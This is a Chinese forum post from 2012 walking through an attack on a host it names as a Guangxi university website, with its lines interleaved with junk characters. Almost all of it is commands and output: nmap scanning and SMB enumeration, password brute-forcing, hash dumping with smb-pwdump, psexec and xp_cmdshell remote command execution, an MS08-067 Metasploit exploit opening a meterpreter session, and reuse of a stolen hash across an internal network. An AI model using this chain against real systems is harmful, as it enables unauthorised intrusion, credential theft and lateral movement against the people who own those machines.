广西师范网站http://202.103.242.241/3 G$ Y! A! E+ `. Z' T5 @
' h) t' W: h" ]5 W; W& B) F# W) E
root@bt:~# nmap -sS -sV 202.103.242.241' Z3 e$ N% p$ A* N
+ I ~; W; S& R# s
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
6 O' P* s( [2 N$ f( J9 M# z
% p9 L9 n5 m5 m# T4 w# GNmap scan report for bogon (202.103.242.241)
1 A& ]* X" N3 f5 Q7 o8 V! O2 ?! c4 ~7 N* z$ P7 W
Host is up (0.00048s latency).
6 X) T) R( X2 ]- _) m( U; [6 L& w/ n. ^3 V' V
Not shown: 993 closed ports
' q" f" y! h5 q$ @4 A0 o: {. N/ J5 D& Z6 ]( _ f6 _. R8 \
PORT STATE SERVICE VERSION" E; h! {! K) @% @. z
3 E2 x6 Y8 h7 M$ F( |135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
" \' x& n# y2 c
% J8 w2 _- F% G- H: f0 ~139/tcp open netbios-ssn5 O3 X4 a% q/ N+ _
8 O% F5 Y% c. C+ J+ p$ e B445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds$ X2 s: b' B; K1 {! U
4 X$ j z' w) q; a) u2 [
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
& C7 K/ S1 k& g2 I5 Q; O. m
1 x: O! i. J4 H2 k+ `0 x/ Q) |1026/tcp open msrpc Microsoft Windows RPC
1 z' l) d9 X- n. t, T1 A( w
3 X" I9 r6 b g( {3372/tcp open msdtc?* @; R0 W3 S3 X. F
4 J& f3 [3 c5 T; Z/ ]+ t# K
3389/tcp open ms-term-serv?& ^/ v& J3 u5 P" s: E0 G1 v
7 s" n3 f1 C# f9 c6 }
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
# B9 v' g: Y8 ?, sSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r8 Y8 i0 z8 O( U7 u" H
( @/ p& B% t; z8 V( |
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions/ h5 x5 o/ `* S" z# G
7 R2 G7 T7 I0 A: F: bSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
# F; z9 S2 n: M' k$ B
6 ~# q8 k- P9 s0 a7 |' f! BSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO) z/ Q' ?, {: M5 g; M( Q# V: @
/ F. ^4 S" D# X$ DSF:ptions,6,”hO\n\x000Z”);
9 k3 J ~! x- }' D6 b/ T2 z* s$ [" [6 m' S
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)+ h7 L ] m& X- l! e
4 W8 ~3 T; x& z& n. @
Service Info: OS: Windows, [( p6 }0 D2 A5 U
[. R7 a2 [6 \7 L& }% k
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .3 t" {$ h/ `5 F! h- Q! s
* J6 k+ X2 Z: W! P9 SNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
& M7 P! l0 h1 H, F) A
2 U1 q* F! b& W# uroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本2 @) M& E- o4 C; L* \- A
/ }3 ]/ G+ v& b7 W) J. ~$ @: E" U
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse7 A4 Y% v# N& u. `6 F1 E
- \0 R% u/ W# ~
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
/ n( k1 `7 Q6 j, M& p+ f' a* u) Q1 |0 _) c& @9 B9 j0 A: k+ x
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse6 ~9 Y, A1 P# M, f! h
+ h7 f0 l3 p1 z( e-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
8 R) t. N$ B v& [* S# V
, h! l$ T2 p1 I# G- {-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
6 I5 J- H Y0 ~0 z, q: s& e( G8 X3 M: `# X( r6 c
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
3 S* A" e2 {3 F. ]+ `5 ?/ g5 r n8 z0 g* n3 G- A
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
6 n2 C% z" u9 v+ e8 s3 s% T( K* d% i; t( d; C n6 Y
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
/ D5 v+ _8 o$ t4 K7 S
7 Q" k* |' ^/ O+ H, a-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
, O( J" m+ p- H( `/ I+ K
; c- p6 Z% |% _) y-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
+ D& Y7 U; y1 F
F X9 g# s+ E8 h: l9 p, p-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
8 I& H; Z! U, Z5 K `
! ]6 O$ k* f8 U. S4 J$ h. |% z4 G-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse' X, t( p/ z! q9 Z
; R# ^8 A, k0 c-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse' z8 ~9 c. B. E
4 ?7 x5 m: a% A5 T0 ?9 } u+ R W
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
4 C4 s& C! W; S/ U- |0 ~" m& `7 F: W9 x+ @0 Y' X) u; P9 D6 O
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
( f# D. r% m, u" B" @! |+ g3 X" E
( i' l- ^# b7 N, K5 |. oroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
! U, j/ X7 O7 t
& o* z5 M R! m+ l% v5 }2 a//此乃使用脚本扫描远程机器所存在的账户名
) ?& y) d; f! G1 R! k9 l- O, y& `/ k. Q4 x0 p5 `) S1 i* u. Y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
: u) u' j/ h" I! f4 B2 `9 B. r& ^/ K. v0 W
Nmap scan report for bogon (202.103.242.241)
6 j; ~4 ~7 `4 h3 _2 q
+ M4 I4 I# s, i- r" m% t0 e8 _Host is up (0.00038s latency)./ @+ Z6 f5 G4 E6 A, q
+ `& M4 ?8 r$ I9 A; D3 G
Not shown: 993 closed ports, J# p9 `& M" K3 k7 Y% R7 M, N
3 u$ U) G- p6 R; m1 H6 `" F4 b
PORT STATE SERVICE
4 ~% g$ s8 v5 ?1 r* ]
, j! r8 N2 _% W$ j! f135/tcp open msrpc
0 s$ {! Y' w- J$ S, E5 y
8 K! u% K; I: b139/tcp open netbios-ssn
+ z- b% ?# n8 P$ w8 y' K# q% d6 i/ k" F
445/tcp open microsoft-ds
2 I/ \% w' u" r U, u9 I5 @ m9 K- |; y
1025/tcp open NFS-or-IIS
/ U* O3 e N+ Y7 L4 e4 s! g( W
1026/tcp open LSA-or-nterm
* ]( s% I; J# r: p; H q7 {/ Q5 t& q" M
3372/tcp open msdtc
% Z5 F* ^4 F3 J, w4 T7 ^6 I7 f( l. Q5 V2 L% K+ z
3389/tcp open ms-term-serv3 p, I# c- [ U6 k$ {
. r2 j0 E' E( M! X z: Z" k2 H) v
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)- M) G! F, }4 t! c, {
, o) w; K& _; N) X& `2 r |Host script results:3 A# w3 _+ \7 g' v* `
$ Z D! Z3 B* G| smb-enum-users:; B1 Z$ a1 p Q. ~4 i( ^( c
5 D7 }# N& O g5 i) M9 d
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
# ~- q9 p! k% E, L5 d6 x' o! V
5 e, Y2 U" W% J2 s" V1 `Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds2 e q6 t5 y4 N; ?, o+ l
* o$ N% E- M) c( yroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
, E' B9 W' L) ?, @: \1 @) c- J" ?) Q! W" l
//查看共享* n6 t- e: a' f. w9 z. w! \. w
, g7 x5 }% x& L( ^# oStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
7 G& y8 X! X4 |$ L2 l2 Y
; E4 F' U, u5 RNmap scan report for bogon (202.103.242.241)! Z6 w0 @# }% s! f9 b
+ C) ~5 D( c& ]2 F! bHost is up (0.00035s latency).
* q5 E/ V! n9 h0 B# I* M# C- B) ~ o5 M3 `- N$ c6 J' Z
Not shown: 993 closed ports3 B; _1 \' \4 O" b
9 s3 r2 W3 K0 W6 {
PORT STATE SERVICE; K4 c A2 h; h7 Z
9 i- W |) A, N! x
135/tcp open msrpc
( T: M0 u# Y5 b4 z& I2 J8 Q; g$ C* T8 o. Y8 a+ K4 @$ m
139/tcp open netbios-ssn0 G6 q D- k8 B
7 i1 B4 M+ }/ \+ T0 P- l% H/ ~445/tcp open microsoft-ds5 k7 g# z0 K* h+ ^) U$ a
: d5 I2 c/ k( _1025/tcp open NFS-or-IIS; q/ g; K4 N" W
. ~( _$ r4 L# F, P$ W
1026/tcp open LSA-or-nterm
& E5 ~; Y7 Z K, X% J+ V
5 @) y3 P3 e: h) O @' L7 u3372/tcp open msdtc
+ _+ n( _8 Y, O) ~. M0 _2 u* n
6 A9 R! i) @! q; i3389/tcp open ms-term-serv& A9 W' N* X p
" D: Y8 U# m) v2 R: h- e8 AMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems). w. d r0 m; [1 Y
4 k# t, X4 J2 L6 L4 ^
Host script results:( D- x' V z1 _$ K. K( P
; @$ }! `7 m3 F! t1 a, a| smb-enum-shares:4 t5 V1 Y. q& g* c1 _( ~
% c- j6 X1 C: A0 K5 n$ x! e/ J. r! _1 Z
| ADMIN$9 h8 j: d8 a7 u" x
! w" U6 X% c! X, a% A" s| Anonymous access: <none>
9 D/ q3 ?' T- c0 K s" \! t% R% `3 U4 p; r( v
| C$1 a0 H7 h# Z6 a: {/ [, y
/ T. b+ s' O) b' V
| Anonymous access: <none>: ]* P- B+ U F0 A/ {8 E2 N
. V8 C7 G: B8 t| IPC$, \) e$ i! n' P# P6 z# Q- \4 K
- i6 q3 \) }2 B|_ Anonymous access: READ
- {2 g0 j( C, q+ T8 ~- V8 u Y5 J8 K8 k: r0 x9 K( G1 W/ U; n
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
& _* m, J/ V+ H) x- P9 E% F2 T- ]/ R! G5 u- s# e6 i
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
2 L$ T' w: ]) E8 ^' t
# m& X. l( [ V5 l) L- X( X//获取用户密码
4 J* q3 v6 u$ [% q, u) B. q2 B1 {5 h7 s z! |
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
0 w" |0 l) @. q3 p% x1 B2 Z) V; N1 V, D4 C0 v& e4 N' M. G$ N
Nmap scan report for bogon (202.103.242.2418)' p5 Q# I. [4 m" B; ^2 J8 q g
# }$ ~, d6 l* L& X9 o8 m
Host is up (0.00041s latency).; z3 c- O0 _% T! ^7 M- k! v
8 q) i' _: p9 k, C; Q) |4 z$ P6 V; h
Not shown: 993 closed ports
" D8 }$ m( o) I8 m" C3 \% o q/ F3 _1 e: J# f) y
PORT STATE SERVICE. h4 K! }/ c2 D4 ?/ W3 ]+ U* A
9 I- O4 T9 W) ^$ d: k/ ?
135/tcp open msrpc
! e3 F( U! ?: i/ c
' v2 b& [8 b1 T8 y2 M: s0 E139/tcp open netbios-ssn
: _2 O& h) Y& @# W! c! i4 n0 y9 I* v
445/tcp open microsoft-ds8 I9 L+ z7 \/ ^+ A. x% S
* k5 V% f( n3 ~/ d5 [- J' G1025/tcp open NFS-or-IIS$ l1 h! X6 X0 X* e1 x7 }/ L
% R; o p" `, [+ z8 N- H1026/tcp open LSA-or-nterm8 f9 |( {6 u! ^" D
1 }8 l- `$ s6 Z" P
3372/tcp open msdtc4 \, W# k3 Z1 R8 @0 I, F5 X. T
# K% J; B w( M3 y, B
3389/tcp open ms-term-serv
* b1 `, `2 X4 n" F* ^# }8 ^1 ]8 k A9 k) q2 X
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
) Z0 _0 s1 f' S3 m( V+ x% x8 E! q6 ~1 W" ^: x3 }
Host script results:
1 h: f# W( m# C' @; }/ r$ G: d: _! V0 Y- I
| smb-brute:9 z5 o/ @0 ~: b( l% S) ^" \/ F* n2 l
6 o' k6 e, | e2 h- f. b+ \administrator:<blank> => Login was successful5 ?& V& x3 |: [. Y
# M3 s- x7 ^/ _$ Y
|_ test:123456 => Login was successful( i- o! l! o9 m' n
+ g J0 G1 O, j! S8 j
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
( U" W6 g$ f5 ]3 c. o2 n; g! Y% ~3 h9 i L
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
- G9 P3 l' i" g V! O# R5 i) K; X
7 M0 Q! m5 Z6 @# U$ ?root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data) h1 r( s: e5 Q; \0 s( F
# b$ Z3 G+ f s) P5 o- {/ Croot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse7 Z% b/ }3 ]: y2 w) }
/ j1 H J3 ~ A# N5 Droot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
6 A( B, q5 x4 o, L0 e8 ~! ]- Z! ], @* U( I0 H: f% r
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST+ ^3 V0 `& q6 i+ u5 @
+ n+ F: p3 C1 Q# \( Z4 _/ hNmap scan report for bogon (202.103.242.241)4 }7 {, T' k4 r5 X9 x. H3 `
( m6 B1 A6 x$ G1 N/ [: V- \2 E
Host is up (0.0012s latency).
5 B# \4 W! V9 i3 x, D$ J' \' E5 F" h( e0 c# p! E0 }
PORT STATE SERVICE
: n2 z: @9 \! h' Q2 s( p, r
: \! M* P/ ?( O# J! ~9 h0 x" p135/tcp open msrpc
^) m- ^7 O) r- P
2 e9 @9 d# D6 K3 c% |( O; B139/tcp open netbios-ssn% ]3 U l5 w; ] a- E: I, z
1 O/ ^7 n0 z4 h( K
445/tcp open microsoft-ds
1 s2 P' A. d# ]% L, w! n* ^1 ~. s5 b6 r! C! }& D
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)! V) R0 i% z+ t1 ~% I; `% H
* `; c- r+ W% G8 _Host script results:8 a. [9 W3 X2 r$ d- G
% X" b% R! |. h| smb-pwdump:0 Y5 L8 ?4 g2 d) O7 v
8 }, O# l1 J$ s- T6 ~
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
+ l% ~8 W, a0 s# T% O
& B. e2 z8 i; `/ C| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************& J- t9 b/ o7 Q) v: w B7 k; c
0 ?- g' ]9 V7 L' B7 V# a& `) A6 _| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
: `5 l; m1 p$ G. ~" l
7 u G. C# M5 ~+ t|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
1 C C! x/ L @' @
/ ^ m; I9 h- ^# R2 j; B% A6 rNmap done: 1 IP address (1 host up) scanned in 1.85 seconds" @ k) F: z/ h6 U$ o" O; F( G
4 r' @1 C7 {& w2 v% aC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
- n2 j6 o9 d1 g! v* r8 ?. d! C( _1 b" \7 w5 K& ~; E: ^
-p 123456 -e cmd.exe2 A( M- W+ _. w
. r; O0 b6 S: G
PsExec v1.55 – Execute processes remotely2 O, D* b+ L( w- U
& p' ]1 U! }/ S5 h; F2 g- JCopyright (C) 2001-2004 Mark Russinovich, R2 Z$ N0 }8 w1 S* L( `6 u
2 x+ S& y5 L; f0 y) C; y/ m, q
Sysinternals – www.sysinternals.com5 }" a" C4 ^! n
) F8 J ?$ H- [/ e7 ?8 I U' `Microsoft Windows 2000 [Version 5.00.2195]8 ^5 H: `$ B4 O5 a, I
! y& F" }2 i5 L' y2 R
(C) 版权所有 1985-2000 Microsoft Corp.! z8 i7 R i5 C# z2 Z! ^, V. U9 r# ?
0 S8 I3 ~7 ]& g% ^& c5 sC:\WINNT\system32>ipconfig6 |: E* p% H) j6 n6 g0 Y! V+ b8 c
3 t+ E+ P b9 I5 b0 @0 @4 U0 m
Windows 2000 IP Configuration
! ?8 t$ [5 y- c$ D" V/ H. K$ n) R" O( M4 g
Ethernet adapter 本地连接:
% d, x. V( i j: r8 W5 v2 K h" z' F6 M+ E/ t% T
Connection-specific DNS Suffix . :
1 V8 g. W& Z/ l5 y& E* T! R3 y3 [- N6 X) G( r1 f: Q
IP Address. . . . . . . . . . . . : 202.103.242.2416 O# c0 ~0 ?; f6 f3 p) G
4 B1 m( X7 P: ]* V& _+ l
Subnet Mask . . . . . . . . . . . : 255.255.255.0
+ m( b9 q, u) E+ \. i9 S
' y$ t q/ I& HDefault Gateway . . . . . . . . . : 202.103.1.13 o( g6 P* t* H5 v% D
# ?$ ~4 t% V# v
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
! D9 x" `3 G) L2 r4 |3 G+ O& x: \4 f9 I6 @& h' r* _6 [) U) R. I
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞* G/ r6 a- q' \* q$ I6 l+ u3 A- G
9 D" {+ Z: ?0 h% V: l/ V" `2 W; KStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST" }$ q, N2 S& D# h" p
0 q! C, z- i& e1 w- _% t: oNmap scan report for bogon (202.103.242.241)( l/ n% I$ D. i4 g
5 K4 U: H5 K3 u$ ?) ?
Host is up (0.00046s latency).3 ]' Z3 K! E. w3 j
" J4 ^2 Z4 L' t6 o1 f# S9 rNot shown: 993 closed ports2 v( J Z8 Q1 I5 f
4 b n1 m! c0 `! a4 O) Q7 q1 t
PORT STATE SERVICE$ V& d! y' n$ f* t: N
! X4 n" @' \; o6 |) C
135/tcp open msrpc
* z! n9 o o1 v( c# z
1 K6 o+ @. I- d. s2 @3 T139/tcp open netbios-ssn- a8 ~, Q; _, F; b" i I
% |0 a% o# I+ v8 _ A5 T4 r
445/tcp open microsoft-ds
: M% ^% e. u' H! _
5 a$ v3 w. R2 g8 Y1025/tcp open NFS-or-IIS2 p! J' L/ u( {8 a$ n8 {8 U
& T3 }8 U5 g0 s" X! }1026/tcp open LSA-or-nterm( Y5 P$ F& I' G2 _" p* p
3 C- _4 B+ ], c& a( ~+ A& W0 G3 @+ n
3372/tcp open msdtc/ l+ }- z# N3 c0 P: i; I
2 t0 b* t7 g+ u3389/tcp open ms-term-serv
$ @' s& X! H3 S# W- J( T2 h6 R9 `8 @- O7 B: B* {) Y7 P9 |
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# X6 j+ |! p+ x% F! j, ?# ~# e
" q: A) L7 a1 D* F k
Host script results:& ~, g5 l9 J9 ]: _# {* K* J
2 X" Z) I7 m, y. n. _| smb-check-vulns:
9 K" `# D, r) x3 [, K6 l2 t- l% `# }! e2 t* `
|_ MS08-067: VULNERABLE
4 ^, v5 [- l I3 O5 w; }1 w7 P) {3 n- A; c
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds9 @1 n2 v, `9 U
( D- q5 I2 \5 h. V( Rroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出) @& e. [+ _* [0 Y# e
4 D7 O" x$ [% D+ e wmsf > search ms083 x& Z; _$ _" C: K4 H; B- ?+ q
) v- _" R# ~( A
msf > use exploit/windows/smb/ms08_067_netapi
8 A. G# e' H6 R6 t: Q( P8 S! a. O& V% l z. P
msf exploit(ms08_067_netapi) > show options
0 r, k/ z0 Y8 l+ l+ X2 U
& k' \% X+ ^1 I, j c2 m3 @msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
- v2 v/ t, t1 e% w, V+ Y" z! C" ^ ^0 j$ m0 i3 {9 f
msf exploit(ms08_067_netapi) > show payloads# R( A0 E4 Z* A+ j3 _" Z7 C @
9 d8 H0 S0 L5 E9 `4 H
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp9 i _/ c2 G" D& C6 U) H! F
, F3 t) B; C( v9 c! B) fmsf exploit(ms08_067_netapi) > exploit2 ?" [2 {& Q1 s' I7 l$ |) X# p
# Y' Q9 X/ S; y; [. P8 G" Vmeterpreter >
! s! s2 X2 G o, r, m* T9 s z% p, R, D ~
Background session 2? [y/N] (ctrl+z)3 U- c% @& `# U, U3 p3 u
! A9 h2 t X( {: X3 Omsf exploit(ms08_067_netapi) > sessions -l- S% G) }6 Q6 A0 v0 h
; K' @: t6 X& \1 w0 O1 `
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt+ p. s% R" E* X$ A# F
: J; C# u4 W7 j$ }$ L: @test
5 c# `9 ~) f$ ^. L' L: N# a: f" b
6 e: s4 D% }2 k7 ~2 B1 v( B) ~administrator
7 E, D7 U; a+ E9 `1 J
( Q4 q1 |, |3 Z' _, N7 m6 b T3 sroot@bt:/usr/local/share/nmap/scripts# vim password.txt
p) e7 \' M1 x- U9 s9 M; g2 h
6 \) P {( p" B+ k. H0 J3 S7 Y$ K. s44EFCE164AB921CAAAD3B435B51404EE
- |- b4 ]+ j) i' m. A& r y( Q- s5 _5 I
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
, ^ v( R! y* K/ a) x+ m' U# ^
//利用用户名跟获取的hash尝试对整段内网进行登录0 D b: C/ Q9 J! M# M% B% z
9 D& x% D: K7 B t0 r1 YNmap scan report for 192.168.1.105. k* u/ i1 n! y1 h- t- q
1 J3 W0 o9 D; v7 L5 ?0 d# qHost is up (0.00088s latency).
: U) I( R) G7 e9 P \6 a4 m1 I8 o. v
Not shown: 993 closed ports
! U0 `) B8 b6 p0 H; C% P" B; t5 \3 V# Y. t* m- U- H
PORT STATE SERVICE3 P/ U* C7 P7 Q9 T* K
( P, |3 n# h. N v$ u8 Y1 o
135/tcp open msrpc
5 X m3 L' I* F7 T+ ]' [- e8 D; h7 o) ^ Z# U( Y2 W9 L
139/tcp open netbios-ssn( ~* }2 E% K, J/ g! F' \
9 _& M. v4 M( V$ u o8 q- e! a445/tcp open microsoft-ds# E1 N1 x$ _, v7 Z/ g
/ w4 Q" V& B6 B0 O1025/tcp open NFS-or-IIS7 R- b. v. J. }
3 C( q- s, M% v' O) M; e1 Z& k- R
1026/tcp open LSA-or-nterm0 Z5 z# k( d5 z: Z
4 m( l' k1 |& ~4 ~7 L3372/tcp open msdtc e: F3 k& p* Y' L! ~" U9 u
0 S9 b% I$ u4 |9 \3389/tcp open ms-term-serv$ U4 A" t; [7 o+ }9 H5 V1 u
' a8 x/ F2 Q* D1 W* E+ GMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
4 n) y- {* E4 C3 l7 C
4 |' X) q+ c; ]' Q- KHost script results:
: G1 k& B9 O$ s
( A# D# }- b$ p1 f* E| smb-brute:
3 z" f) d( \) R% U7 d4 e* O1 y+ A+ }& Q4 d3 o6 w9 c4 i' |, q
|_ administrator:<blank> => Login was successful
' C7 N f8 l% o9 A d2 s; ^7 |7 D) {" S; t. [
攻击成功,一个简单的msf+nmap攻击~~·
6 h7 [( v! V9 i4 X2 m+ \8 x7 }! Z8 n8 T9 p3 z& f
|
发表于 2012-12-4 12:46:42
收藏
支持
反对